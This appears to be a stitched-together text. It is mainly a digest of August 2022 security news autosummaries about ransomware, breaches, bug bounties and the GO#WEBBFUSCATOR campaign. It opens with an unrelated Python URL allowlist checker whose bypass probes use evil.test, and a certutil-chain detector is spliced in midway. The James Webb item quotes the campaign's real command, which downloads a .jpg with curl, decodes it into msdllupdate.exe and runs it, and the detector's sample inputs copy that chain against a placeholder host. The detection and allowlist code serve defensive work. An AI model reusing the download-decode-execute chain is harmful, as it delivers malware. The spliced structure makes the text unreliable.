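from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the app may load in its own WebView.
# The real application's hosts are not given on the page.
ALLOWED_HOSTS = {"example.app"}


def naive_is_trusted(url: str) -> bool:
    """Substring check of the kind that is easy to bypass: the allowed host
    can appear in the path, query, userinfo or as a prefix of another host."""
    return "example.app" in url


def strict_is_trusted(url: str, allowed: set[str] = ALLOWED_HOSTS) -> bool:
    """Parse the URL and accept only https to the allowed host or a subdomain."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "https":
        return False
    if parts.username is not None or parts.password is not None:
        # https://example.app@evil.test/ puts the trusted name in userinfo
        return False
    host = parts.hostname  # lowercased; port and userinfo already stripped
    if not host:
        return False
    return any(host == a or host.endswith("." + a) for a in allowed)


def open_url(url: str) -> str:
    """Routing decision: load in the app's WebView, or hand to the system browser."""
    return "webview" if strict_is_trusted(url) else "external-browser"


# Constructed probe URLs: the first two are legitimate, the rest are bypass shapes.
PROBES = [
    "https://example.app/profile",
    "https://m.example.app/video?id=1",
    "https://example.app.evil.test/",        # trusted name as a leading label
    "https://evil.test/?next=example.app",   # trusted name only in the query
    "https://example.app@evil.test/",        # trusted name as userinfo
    "http://example.app/",                   # downgraded scheme
]

if __name__ == "__main__":
    for url in PROBES:
        print(f"{url:40} naive={naive_is_trusted(url)!s:5} strict={strict_is_trusted(url)!s:5} -> {open_url(url)}")
```

The naive check accepts all six probes; the strict one accepts only the first two. Anything that fails the strict check is routed to the external browser, so the app's JavaScript interfaces are never exposed to it.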


                Apple pushes out emergency updates to address zero-day exploits

                exploits
                2022-09-01 https://www.computerworld.com/article/3672111/apple-pushes-out-emergency-updates-to-address-zero-day-exploits.html#tk.rss_security

                Apple this week released urgent security updates to address zero-day vulnerabilities on older model iPhones, iPads, and iPods.

The patches, pushed out on Wednesday, address an out-of-bounds write issue that could be exploited by an attacker to take control of the affected device. The US Cybersecurity and Infrastructure Security Agency (CISA) today encouraged users and IT admins to review Apple’s advisory HT213428 and apply the necessary updates.


                "

                Autosummary: “The issue is that if a web page is constructed in a certain way, it can cause code to execute on the device outside of the normal containment and effectively create a malware situation on the device that could compromise data, contacts, location, insert malicious SW, etc.,” said Jack Gold, principal analyst at J. Gold Associates, LLC. "


                Ransomware gangs’ favorite targets

                exploits
                2022-08-31 https://www.helpnetsecurity.com/2022/08/31/ransomware-attack-patterns/

                Barracuda released its fourth-annual threat research report which looks at ransomware attack patterns that occurred between August 2021 and July 2022. A closer look at ransomware attack patterns For the 106 highly publicized attacks our researchers analyzed, the dominant targets are still five key industries: education (15%), municipalities (12%), healthcare (12%), infrastructure (8%), and financial (6%): The number of ransomware attacks increased year-over-year across each of these five industry verticals, and attacks against other industries … More

                The post Ransomware gangs’ favorite targets appeared first on Help Net Security.

                "

                Autosummary: "


                Should ransomware payments be banned? A few considerations

                exploits ransomware
                2022-08-31 https://www.helpnetsecurity.com/2022/08/31/should-ransomware-payments-be-banned-considerations-video/

                Several U.S. states have recently moved to ban local and state agencies and organizations funded by taxpayers’ dollars from paying off ransomware gangs, and a few more are gearing up to it. In this Help Net Security video interview, Alex Iftimie, Partner at Morrison & Foerster (MoFo), talks about the possible repercussions of such legislation and, in general, about the evolving nature of ransomware attacks and the current global efforts aimed at fighting the ransomware … More

                The post Should ransomware payments be banned? A few considerations appeared first on Help Net Security.

                "

                Autosummary: "


                5 open-source vulnerability assessment tools to try out

                exploits
                2022-08-31 https://www.helpnetsecurity.com/2022/08/31/5-open-source-vulnerability-assessment-tools-to-try-out/

                A vulnerability assessment is a methodical examination of network infrastructure, computer systems, and software with the goal of identifying and addressing known security flaws. Once the vulnerabilities are pinpointed, they are classified based on how critical it is to fix/mitigate them sooner rather than later. Usually, the vulnerability scanning tool also provides instructions on how to remediate or mitigate the discovered flaws. Security teams can use the findings of a vulnerability assessment to better understand … More

                The post 5 open-source vulnerability assessment tools to try out appeared first on Help Net Security.

                "

                Autosummary: "


                Google invites bug hunters to scrutinize its open source projects

                exploits
                2022-08-31 https://www.helpnetsecurity.com/2022/08/31/open-source-bugs-rewards/

                Google wants to improve the security of its open source projects and those projects’ third-party dependencies by offering rewards for bugs found in them. “Depending on the severity of the vulnerability and the project’s importance, rewards will range from $100 to $31,337. The larger amounts will also go to unusual or particularly interesting vulnerabilities, so creativity is encouraged,” Googlers Francis Perron and Krzysztof Kotowicz explained. Google offers rewards for bugs in its open source software … More

                The post Google invites bug hunters to scrutinize its open source projects appeared first on Help Net Security.

                "

                Autosummary: The latest versions of open source software stored in the public repositories of Google-owned GitHub organizations, and selected repositories hosted on other platforms Repository configuration settings (e.g., GitHub actions, access control rules, GitHub application configurations) Vulnerabilities in third-party dependencies (if they can be triggered or exploited in Google open source projects) “First and foremost, we welcome submissions pointing out vulnerabilities affecting source or build integrity that could result in a supply chain compromise. "


                Hackers Hide Malware in Stunning Images Taken by James Webb Space Telescope

                exploits
                2022-08-31 https://thehackernews.com/2022/08/hackers-hide-malware-in-stunning-images.html
A persistent Golang-based malware campaign dubbed GO#WEBBFUSCATOR has leveraged the deep field image taken from NASA's James Webb Space Telescope (JWST) as a lure to deploy malicious payloads on infected systems. The development, revealed by Securonix, points to the growing adoption of Go among threat actors, given the programming language's cross-platform support, effectively allowing the "

                Autosummary: "


                Google Launches New Open Source Bug Bounty to Tackle Supply Chain Attacks

                exploits
                2022-08-31 https://thehackernews.com/2022/08/google-launches-new-open-source-bug.html
                Google on Monday introduced a new bug bounty program for its open source projects, offering payouts anywhere from $100 to $31,337 (a reference to eleet or leet) to secure the ecosystem from supply chain attacks. Called the Open Source Software Vulnerability Rewards Program (OSS VRP), the offering is one of the first open source-specific vulnerability programs. With the tech giant the maintainer "

                Autosummary: "


                Russian streaming platform Start discloses a data breach impacting 7.5M users

                financial
                2022-08-31 https://securityaffairs.co/wordpress/135069/data-breach/start-data-breach.html

The Russian subscription-based streaming service Start discloses a data breach affecting 7.5 million users. The Russian media streaming platform START disclosed a data breach that impacted 7.5 million of its users. According to the company, the attackers stole a 2021 database from its infrastructure and also shared samples online to demonstrate the authenticity of […]

                The post Russian streaming platform Start discloses a data breach impacting 7.5M users appeared first on Security Affairs.

                "

                Autosummary: “As follows from the leak, 24.6 million Start users registered from Russia, 2.3 million from Kazakhstan, 2.1 million from China, and 1.7 million from Ukraine.” "


                Apple backports fix for actively exploited iOS zero-day to older iPhones

                exploits
                2022-08-31 https://www.bleepingcomputer.com/news/apple/apple-backports-fix-for-actively-exploited-ios-zero-day-to-older-iphones/
                Apple has released new security updates to backport patches released earlier this month to older iPhones and iPads addressing a remotely exploitable WebKit zero-day that allows attackers to execute arbitrary code on unpatched devices. [...] "

                Autosummary: "


                Google Chrome bug lets sites write to clipboard without asking

                exploits
                2022-08-31 https://www.bleepingcomputer.com/news/security/google-chrome-bug-lets-sites-write-to-clipboard-without-asking/
                Chrome version 104 accidentally introduced a bug that removes the user requirement to approve clipboard writing events from websites they visit. [...] "

Autosummary: "While you're navigating a web page, the page can, without your knowledge, erase the current contents of your system clipboard, which may have been valuable to you, and replace them with anything the page wants, which could be dangerous to you the next time you paste. "


Ragnar Locker ransomware claims attack on Portugal's flag airline

                exploits ransomware
                2022-08-31 https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-claims-attack-on-portugals-flag-airline/
                The Ragnar Locker ransomware gang has claimed an attack on the flag carrier of Portugal, TAP Air Portugal, disclosed by the airline last Friday.  [...] "

Autosummary: Ragnar Locker also shared a screenshot of a spreadsheet containing what looks like customer information stolen from TAP's servers, including names, dates of birth, emails, and addresses. "


                GO#WEBBFUSCATOR campaign hides malware in NASA’s James Webb Space Telescope image

                exploits
                2022-08-31 https://securityaffairs.co/wordpress/135090/malware/gowebbfuscator-james-webb-space-telescope.html

                A malware campaign tracked as GO#WEBBFUSCATOR used an image taken from NASA’s James Webb Space Telescope (JWST) as a lure. Securonix Threat researchers uncovered a persistent Golang-based malware campaign tracked as GO#WEBBFUSCATOR that leveraged the deep field image taken from the James Webb telescope. The phishing emails contain a Microsoft Office attachment that includes an external reference […]

                The post GO#WEBBFUSCATOR campaign hides malware in NASA’s James Webb Space Telescope image appeared first on Security Affairs.

                "

Autosummary: "


                Secureworks partners with Netskope and SCADAfence to protect users against threats

                industry
                2022-08-31 https://www.helpnetsecurity.com/2022/09/01/secureworks-netskope-scadafence/

                Secureworks announced the expansion of its alliances program into several new solution areas. With threats expanding into critical production environments and the service edge, detection capabilities must expand, too. Through two new partners, Netskope and SCADAfence, Secureworks widens the range of potential security vulnerabilities addressed by Secureworks Taegis XDR to include Secure Access Service Edge (SASE), Operational Technology (OT), and Industrial Control Systems (ICS). Now, more organizations than ever can benefit from better detection with … More

                The post Secureworks partners with Netskope and SCADAfence to protect users against threats appeared first on Help Net Security.

                "

                Autosummary: “Hybrid work is the new normal, and our customers look for complete SASE solutions to enable performance, deliver data, protect against threats, and maximize return-on-investment,” said Andy Horwitz, VP of Business Development at Netskope. "


                Threat actors breached the network of the Italian oil company ENI

                industry
                2022-08-31 https://securityaffairs.co/wordpress/135116/hacking/eni-suffered-cyberattack.html

                Italian oil giant Eni was hit by a cyber attack, attackers compromised its computer networks, but the consequences appear to be minor. Italian oil giant company Eni disclosed a security breach, threat actors gained access to its network, but according to the company the intrusion had minor consequences because it was quickly detected. “The internal […]

                The post Threat actors breached the network of the Italian oil company ENI appeared first on Security Affairs.

                "

                Autosummary: Last year, Alpharetta, Georgia-based Colonial Pipeline Co. shut the largest fuel pipeline in the US after a ransomware attack crippled its IT systems, and in February, Hamburg, Germany-based oil trader Mabanaft said it was the victim of a cyberattack that disrupted the delivery of fuels across Germany. "


                Malwarebytes receives highest rankings in recent third-party tests

                exploits
                2022-08-31 https://www.malwarebytes.com/blog/business/2022/08/malwarebytes-receives-highest-rankings-in-recent-third-party-tests

                Categories: Business

Malwarebytes Endpoint Protection continues to receive outstanding results in third-party testing: We're proud to have been one of the top-ranked security solutions by two highly-regarded industry evaluations, MRG-Effitas and Info-Tech’s Data Quadrant Report.


                The post Malwarebytes receives highest rankings in recent third-party tests appeared first on Malwarebytes Labs.

                "

Autosummary: Malwarebytes Endpoint Protection blocked a wide range of ransomware, fileless attacks and other threats: 100 percent of “in the wild” threats blocked (tested malware considered zero-day, delivered by URLs); 100 percent of ransomware blocked (tested in-house ransomware samples with no previously known signatures or community verdicts); 100 percent of financial malware blocked (tested financial malware used in the Magecart credit card-skimming attack); 100 percent of fileless attacks blocked (tested to see how security products protect against a specific exploitation technique); 100 percent of PUA/adware blocked (tested potentially unwanted applications, which are not malicious but are generally considered unsuitable for most home or business networks). "


                James Webb telescope images used to hide malware

                exploits
                2022-08-31 https://www.malwarebytes.com/blog/news/2022/08/james-webb-telescope-images-used-to-hide-malware

                Categories: News

                Categories: Threats

                Tags: Msdllupdate.exe

                Tags: macros

                Tags: James Webb

                Tags: certutil

                Tags: Golang

                Tags: base64

                Tags: steganography

                Tags: OxB36F8GEEC634.jpg

                In a recent malware campaign, images from the James Webb telescope were used to hide malware.


                The post James Webb telescope images used to hide malware appeared first on Malwarebytes Labs.

                "

Autosummary: The obfuscated code in the macro executes the following command:

cmd.exe /c cd c:\users\{username}\appdata\local & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

This command downloads a file named OxB36F8GEEC634.jpg, uses certutil.exe to decode it into a binary called msdllupdate.exe and then executes that binary; the legitimate certutil is used to decode the so-called certificate and create the binary. The malware payload copies itself into %localappdata%\microsoft\vault\ and creates and executes a batch file in the same folder called update.bat. "
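The chain quoted above (download, certutil -decode, execute) is a common living-off-the-land staging pattern: certutil -decode simply Base64-decodes its input file, which is why a file named .jpg can turn into an .exe. As an added example that is not from the Malwarebytes or Securonix write-ups, the following Python splits a cmd.exe one-liner on its chaining operators and flags the links a detection engineer would key on: a certutil decode whose output is executable, whose input does not look like a certificate, and whose input was fetched by a downloader earlier in the same chain, followed by execution of the decoded file. The command lines are constructed samples with a placeholder host (download.invalid), not telemetry from the campaign.

```python
import os
import re

# Constructed sample command lines (not real telemetry). The first follows the
# shape of the macro command quoted above with a placeholder host; the other
# two are benign look-alikes that must not fire.
SAMPLE_CMDLINES = [
    r"cmd.exe /c cd c:\users\alice\appdata\local & "
    r"curl http://download.invalid/update/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & "
    r"certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe",
    r"certutil -decode C:\temp\server.b64 C:\temp\server.cer",
    r"cmd.exe /c curl https://download.invalid/tool.zip -o tool.zip",
]

# Extensions certutil -decode legitimately reads from (Base64 text).
CERT_LIKE_EXTS = {".cer", ".crt", ".pem", ".der", ".p7b", ".b64", ".txt"}
# Output extensions that mean the decoded blob is meant to run.
EXEC_EXTS = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1"}
DOWNLOADERS = {"curl", "curl.exe", "wget", "wget.exe", "bitsadmin", "bitsadmin.exe"}


def _basename(path: str) -> str:
    """Last path component, lowercased, tolerant of both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def _ext(path: str) -> str:
    return os.path.splitext(_basename(path))[1]


def split_chain(cmdline: str) -> list[str]:
    """Split a cmd.exe one-liner on its chaining operators (&, &&, |, ||)."""
    return [s.strip() for s in re.split(r"\s*(?:&&|&|\|\|?)\s*", cmdline) if s.strip()]


def _strip_cmd_prefix(tokens: list[str]) -> list[str]:
    """Drop a leading 'cmd.exe /c' or 'cmd /k' so the real command is inspected."""
    if len(tokens) >= 3 and _basename(tokens[0]) in ("cmd", "cmd.exe") \
            and tokens[1].lower() in ("/c", "/k"):
        return tokens[2:]
    return tokens


def analyze_cmdline(cmdline: str) -> list[str]:
    """Return one finding per suspicious link in a certutil staging chain.

    An empty list means none of the patterns matched. Findings are ordered as
    the chain is read, so the caller can see how the stages connect.
    """
    findings: list[str] = []
    downloaded: set[str] = set()    # files written by a downloader in this chain
    decoded_exec: set[str] = set()  # executables certutil produced in this chain

    for step in split_chain(cmdline):
        tokens = _strip_cmd_prefix(step.split())
        if not tokens:
            continue
        exe = _basename(tokens[0])

        if exe in DOWNLOADERS:
            # curl/wget name their output after -o / -O / --output; record it.
            for flag in ("-o", "-O", "--output"):
                if flag in tokens and tokens.index(flag) + 1 < len(tokens):
                    downloaded.add(_basename(tokens[tokens.index(flag) + 1]))

        elif exe in ("certutil", "certutil.exe"):
            if not any(t.lower() in ("-decode", "-decodehex") for t in tokens):
                continue
            files = [t for t in tokens[1:] if not t.startswith("-")]
            if len(files) < 2:
                continue
            src, dst = _basename(files[0]), _basename(files[1])
            if _ext(dst) in EXEC_EXTS:
                findings.append(f"certutil -decode writes executable {dst}")
                decoded_exec.add(dst)
            if _ext(src) not in CERT_LIKE_EXTS:
                findings.append(f"certutil -decode input {src} is not a certificate-like file")
            if src in downloaded:
                findings.append(f"{src} was downloaded earlier in the same chain")

        elif exe in decoded_exec:
            findings.append(f"decoded payload {exe} is executed in the same chain")

    return findings


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(cmd[:60] + "...", "->", analyze_cmdline(cmd) or "clean")
```

On the constructed sample that mirrors the macro command, the analyzer returns four findings, one per stage of the chain; the legitimate certificate decode and the plain download return none. In a real pipeline the same function would run over process-creation command lines (for example Sysmon event ID 1), with a single certutil-to-executable finding already worth an alert.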


                Final Fantasy 14 players targeted by QR code phishing

                financial
                2022-08-31 https://www.malwarebytes.com/blog/news/2022/08/final-fantasy-14-players-targeted-by-qr-code-phishing

                Categories: News

                Categories: Scams

                We take a look at multiple reports of Final Fantasy 14 players attacked by a wave of QR themed phishing.


                The post Final Fantasy 14 players targeted by QR code phishing appeared first on Malwarebytes Labs.

                "

                Autosummary: * On a legitimate website operated by SQUARE ENIX CO., LTD., no other pages apart from login pages will require password entry, nor will any of our staff ever ask you for your password. Please also be aware of the following methods used to direct players to fake pages: ・Using FFXIV in-game chat to direct players to fake pages imitating Square Enix websites, including the Support Center, the Lodestone, and the official FINAL FANTASY XIV Forums. The developers write: As we have mentioned in the past, we have confirmed that certain individuals are attempting to direct players to fake login websites which imitate the Square Enix Account Management System in an effort to steal (also known as “phishing”) information such as their Square Enix ID and password, as well as date of birth. "


                Outdated infrastructure not up to today’s ransomware challenges

                exploits ransomware
                2022-08-30 https://www.helpnetsecurity.com/2022/08/30/outdated-infrastructure-manage-data/

                A global research commissioned by Cohesity reveals that nearly half of respondents say their company depends on outdated, legacy backup and recovery infrastructure to manage and protect their data. In some cases, this technology is more than 20 years old and was designed long before today’s multicloud era and onslaught of sophisticated cyberattacks plaguing enterprises globally. Challenges pertaining to outdated infrastructure could easily be compounded by the fact that many IT and security teams don’t … More

                The post Outdated infrastructure not up to today’s ransomware challenges appeared first on Help Net Security.

                "

                Autosummary: The findings are as follows (respondents were asked to check all that apply): integration between IT and security systems (41%), lack of coordination between IT and Security (38%), lack of an automated disaster recovery system (34%), antiquated backup and recovery systems (32%), lack of a recent, clean, immutable copy of data (32%), and lack of timely, detailed alerts (31%). With respect to the lack of coordination between IT and Security, this coincides with other findings from this survey denoting that a gap often exists between IT and SecOps that puts businesses and security postures at risk. "


                FBI Warns Investors to Take Precautions with Decentralized Financial Platforms

                financial
                2022-08-30 https://thehackernews.com/2022/08/fbi-warns-investors-to-take-precautions.html
                The U.S. Federal Bureau of Investigation (FBI) on Monday warned of cyber criminals increasingly exploiting flaws in decentralized finance (DeFi) platforms to plunder cryptocurrency. "The FBI has observed cyber criminals exploiting vulnerabilities in the smart contracts governing DeFi platforms to steal investors' cryptocurrency," the agency said in a notification. Attackers are said to have used "

                Autosummary: "


                DDoS activity launched by patriotic hacktivists is on the rise

                industry
                2022-08-30 https://www.helpnetsecurity.com/2022/08/30/malicious-ddos-attacks-video/

                Radware released a report revealing that the number of malicious DDoS attacks climbed by 203% compared to the first six months of 2021. This Help Net Security video provides information about the rise of DDoS activity launched by patriotic hacktivists.

                The post DDoS activity launched by patriotic hacktivists is on the rise appeared first on Help Net Security.

                "

                Autosummary: "


                World’s largest distributors of books Baker & Taylor hit by ransomware

                exploits ransomware
                2022-08-30 https://securityaffairs.co/wordpress/135026/cyber-crime/baker-taylor-ransomware.html

                Baker & Taylor, one of the world’s largest distributors of books, revealed that it was hit by a ransomware attack. Baker & Taylor, one of the world’s largest distributors of books worldwide, suffered a ransomware attack on August 23. The incident impacted the company’s phone systems, offices, and service centers. On August 24, the company […]

                The post World’s largest distributors of books Baker & Taylor hit by ransomware appeared first on Security Affairs.

                "

                Autosummary: "


                Google launches open-source software bug bounty program

                exploits
                2022-08-30 https://www.bleepingcomputer.com/news/google/google-launches-open-source-software-bug-bounty-program/
                Google will now pay security researchers to find and report bugs in the latest versions of Google-released open-source software (Google OSS). [...] "

                Autosummary: Reward ranges by category:

                Category                 | Flagship OSS projects | Standard OSS projects
                Supply chain compromises | $3,133.7 - $31,337    | $1,337 - $13,337
                Product vulnerabilities  | $500 - $7,500         | $101 - $3,133.7
                Other security issues    | $1,000                | $500

                "Before you start, please see the program rules for more information about out-of-scope projects and vulnerabilities, then get hacking and let us know what you find." "


                Three campaigns delivering multiple malware, including ModernLoader and XMRig miner

                exploits
                2022-08-30 https://securityaffairs.co/wordpress/135046/malware/malware-campaigns-modernloader.html

                Researchers spotted three campaigns delivering multiple malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners. Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering multiple malware, including the ModernLoader bot (aka Avatar bot), RedLine info-stealer and cryptocurrency miners to victims. ModernLoader is a .NET remote access trojan that […]

                The post Three campaigns delivering multiple malware, including ModernLoader and XMRig miner appeared first on Security Affairs.

                "

                Autosummary: Researchers spotted three campaigns delivering multiple malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners. Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering multiple malware, including the ModernLoader bot (aka Avatar bot), RedLine info-stealer and cryptocurrency miners to victims. "


                Chinese hackers target Australian govt with ScanBox malware

                exploits
                2022-08-30 https://www.bleepingcomputer.com/news/security/chinese-hackers-target-australian-govt-with-scanbox-malware/
                China-based threat actors have been targeting Australian government agencies and wind turbine fleets in the South China Sea by directing select individuals to a fake website impersonating an Australian news media outlet. [...] "

                Autosummary: Browser fingerprinting: identifies and analyzes the victim’s browser technical capabilities; Peer connection: implements WebRTC for real-time communication over APIs; Security check: checks if Kaspersky security tools are installed on the victim’s machine. Once the framework has been assembled on the victim’s machine and the selected plugins are loaded, it sets up command and control (C2) communications and begins sending victim profile data, technical details, and information useful for reconnaissance and basic espionage. "


                Microsoft Azure outage knocks Ubuntu VMs offline after buggy update

                exploits
                2022-08-30 https://www.bleepingcomputer.com/news/microsoft/microsoft-azure-outage-knocks-ubuntu-vms-offline-after-buggy-update/
                Microsoft Azure customers' virtual machines (VMs) running Ubuntu 18.04 have been taken offline by an ongoing outage caused by a faulty systemd update. [...] "

                Autosummary: "


                TikShock: Don’t get caught out by these 5 TikTok scams

                financial
                2022-08-30 https://www.welivesecurity.com/2022/08/30/tikshock-dont-get-caught-out-5-tiktok-scams/

                Are you aware of the perils of the world’s no. 1 social media? Do you know how to avoid scams and stay safe on TikTok?

                The post TikShock: Don’t get caught out by these 5 TikTok scams appeared first on WeLiveSecurity

                "

                Autosummary: Furthermore, while in an app that people are scrolling minute after minute, even hour after hour, scams can easily catch people off guard and often make them lose money, their account, or even their reputation. "Pretty sure I’ve just got a Phishing scam text via someone texting via actual tiktok pic.twitter.com/UCGhsoWz56" — Carrie Walsh (@carrie_walsh_) August 17, 2022. Bot accounts: TikTok is, unfortunately, still full of bot accounts that cleverly interact with users in a way that makes the targeted users think they are chatting with a real person. "


                A new Google bug bounty program now covers Open Source projects

                exploits
                2022-08-30 https://securityaffairs.co/wordpress/135059/security/google-bug-bounty-open-source.html

                Google this week launched a new bug bounty program that covers the open source projects of the IT giant. Google launched a new bug bounty program as part of the new Open Source Software Vulnerability Rewards Program (OSS VRP) that covers the open source projects of the IT giant. The company will pay up to $31,337 […]

                The post A new Google bug bounty program now covers Open Source projects appeared first on Security Affairs.

                "

                Autosummary: Google encourages white hat hackers and bug hunters to submit vulnerabilities that lead to supply chain compromise, design issues, and other security issues such as sensitive or leaked credentials, weak passwords, or insecure installations. "


                Hackers hide malware in James Webb telescope images

                exploits
                2022-08-30 https://www.bleepingcomputer.com/news/security/hackers-hide-malware-in-james-webb-telescope-images/
                Threat analysts have spotted a new malware campaign dubbed "GO#WEBBFUSCATOR" that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware. [...] "

                Autosummary: Obfuscated VBS macro (left) and decoded command to download the JPG file (right) (Securonix). In an image viewer, the .JPG shows the galaxy cluster SMACS 0723, published by NASA in July 2022. "


                Russian streaming platform confirms data breach affecting 7.5M users

                financial
                2022-08-30 https://www.bleepingcomputer.com/news/security/russian-streaming-platform-confirms-data-breach-affecting-75m-users/
                Russian media streaming platform "START" (start.ru) has confirmed rumors of a data breach impacting millions of users. [...] "

                Autosummary: One discrepancy between START’s statement and the leaked dump is that the latter contains md5crypt-hashed passwords, IP addresses, login logs, and subscription details, which have not been included in the official statement from the platform. "


                British Airways customers targeted in lost luggage Twitter scam

                financial
                2022-08-30 https://www.malwarebytes.com/blog/news/2022/08/steer-clear-of-lost-luggage-scams-on-twitter

                Categories: News

                Tags: social media

                Tags: twitter

                Tags: luggage

                Tags: airline

                Tags: terminal

                Tags: scam

                Tags: fake

                Tags: fraud

                Tags: send money

                Fake customer support accounts are extracting cash from people looking for some help on Twitter.


                The post British Airways customers targeted in lost luggage Twitter scam appeared first on Malwarebytes Labs.

                "

                Autosummary: Lose your luggage, find a fraud: People posting about missing luggage on Twitter quickly found their replies filling up with offers to help from a non-verified account purporting to be British Airways. Avoiding the luggage assistance fakers: Here are some things you should do, and be aware of, when in transit. "


                Rise in IoT vulnerability disclosures, up 57%

                exploits industry
                2022-08-29 https://www.helpnetsecurity.com/2022/08/29/vulnerability-disclosures-iot-devices/

                Vulnerability disclosures impacting IoT devices increased by 57% in the first half (1H) of 2022 compared to the previous six months, according to research by Claroty. The report also found that over the same time period, vendor self-disclosures increased by 69%, becoming more prolific reporters than independent research outfits for the first time, and fully or partially remediated firmware vulnerabilities increased by 79%, a notable improvement given the relative challenges in patching firmware versus … More

                The post Rise in IoT vulnerability disclosures, up 57% appeared first on Help Net Security.

                "

                Autosummary: Vendor self-disclosures: For the first time, vendor self-disclosures (29%) have surpassed independent research outfits (19%) as the second most prolific vulnerability reporters, after third-party security companies (45%). "


                Resecurity partners with ECOMIL SAS to improve cybersecurity for Colombian organizations

                latam ciber
                2022-08-29 https://www.helpnetsecurity.com/2022/08/29/resecurity-ecomil-sas/

                Resecurity announced its partnership with ECOMIL SAS to expand Resecurity’s AI-driven cybersecurity solutions and threat intelligence services to Colombia. Based in Bogotá, Colombia, ECOMIL SAS provides cybersecurity, IT management and networking solutions to enterprise and government customers in Colombia. Colombia is rapidly transforming to a digital economy, where remote work has exploded 400% post pandemic. The transition to a digital economy has increased the threat of cyber-attacks, which increased 59% in the first half of … More

                The post Resecurity partners with ECOMIL SAS to improve cybersecurity for Colombian organizations appeared first on Help Net Security.

                "

                Autosummary: "


                The complexity of modern aircraft cybersecurity

                ciber
                2022-08-29 https://www.helpnetsecurity.com/2022/08/29/modern-aircraft-cybersecurity-video/

                Modern aircraft are more connected now than they ever have been. The results have been rewards like faster flight turnarounds, greater fuel efficiency, and more comfortable and enjoyable passenger experiences. Underpinning all of this technology, however, is operational technology: the digital components inside aircraft that allow the sensors and actuators inside of them to interact with one another and fly passengers safely. This operational technology was designed in an era with safety and reliability at … More

                The post The complexity of modern aircraft cybersecurity appeared first on Help Net Security.

                "

                Autosummary: "


                Attackers changing targets from large hospitals to specialty clinics

                industry
                2022-08-29 https://www.helpnetsecurity.com/2022/08/29/data-breach-healthcare-organizations/

                Critical Insight announced the release of the firm’s H1 2022 Healthcare Data Breach Report, which analyzes breach data reported to the United States Department of Health and Human Services by healthcare organizations. With the healthcare industry continuing to be a top attack vector for cybercriminals and ransomware threat groups, H1 2022 saw an interesting change in targets as attackers moved from large hospital systems and payers, big targets that would likely yield the most data … More

                The post Attackers changing targets from large hospitals to specialty clinics appeared first on Help Net Security.

                "

                Autosummary: With the healthcare industry continuing to be a top attack vector for cybercriminals and ransomware threat groups, H1 2022 saw an interesting change in targets as attackers moved from large hospital systems and payers, big targets that would likely yield the most data but also have more sophisticated defenses, to smaller hospital systems and specialty clinics that lack the same level of security preparedness, staff size, or budget. "


                CISA Adds 10 New Known Actively Exploited Vulnerabilities to its Catalog

                exploits
                2022-08-29 https://thehackernews.com/2022/08/cisa-adds-10-new-known-actively.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added 10 new actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, including a high-severity security flaw affecting industrial automation software from Delta Electronics. The issue, tracked as CVE-2021-38406 (CVSS score: 7.8), impacts DOPSoft 2 versions 2.00.07 and prior. A successful "

                Autosummary: Among other actively exploited flaws added to the list are: CVE-2022-26352 - dotCMS Unrestricted Upload of File Vulnerability; CVE-2022-24706 - Apache CouchDB Insecure Default Initialization of Resource Vulnerability; CVE-2022-24112 - Apache APISIX Authentication Bypass Vulnerability; CVE-2022-22963 - VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability; CVE-2022-2294 - WebRTC Heap Buffer Overflow Vulnerability; CVE-2021-39226 - Grafana Authentication Bypass Vulnerability; CVE-2020-36193 "


                CISA adds 10 new flaws to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-08-29 https://securityaffairs.co/wordpress/134975/security/cisa-known-exploited-vulnerabilities-catalog.html

                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 10 new flaws to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 10 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including a high-severity security flaw (CVE-2021-38406, CVSS score: 7.8) impacting Delta Electronics industrial automation software. According to Binding Operational Directive (BOD) 22-01: […]

                The post CISA adds 10 new flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: The other vulnerabilities added to the catalog are: CVE-2022-26352 – dotCMS Unrestricted Upload of File Vulnerability; CVE-2022-24706 – Apache CouchDB Insecure Default Initialization of Resource Vulnerability; CVE-2022-24112 – Apache APISIX Authentication Bypass Vulnerability – "


                Scammers used a deepfake AI hologram of Binance executive to scam crypto projects

                financial
                2022-08-29 https://securityaffairs.co/wordpress/134942/hacking/binance-scammers-deepfake-video.html

                Scammers used a deepfake AI hologram of the Binance chief communications officer for fraudulent activities. Patrick Hillmann, chief communications officer of Binance, confirmed that scammers used his Deepfake AI hologram to trick users into online meetings and target the projects of clients of the company. Hillmann explained in a blog post that the attack was […]

                The post Scammers used a deepfake AI hologram of Binance executive to scam crypto projects appeared first on Security Affairs.

                "

                Autosummary: "


                Montenegro says Russian cyberattacks threaten key state functions

                government ciber
                2022-08-29 https://www.bleepingcomputer.com/news/security/montenegro-says-russian-cyberattacks-threaten-key-state-functions/
                Members of the government in Montenegro are stating that the country is being hit with sophisticated and persistent cyberattacks that threaten the country's essential infrastructure. [...] "

                Autosummary: Targets include electricity and water supply systems, transportation services, online portals that citizens use to access various state services, and more. "


                Facebook agrees to settle class action lawsuit related to Cambridge Analytica data breach

                financial
                2022-08-29 https://www.csoonline.com/article/3671333/facebook-agrees-to-settle-class-action-lawsuit-related-to-cambridge-analytica-data-breach.html#tk.rss_security
                The four-year-old lawsuit claimed Facebook allowed the British political consulting firm access to private data of over 80 million users. "

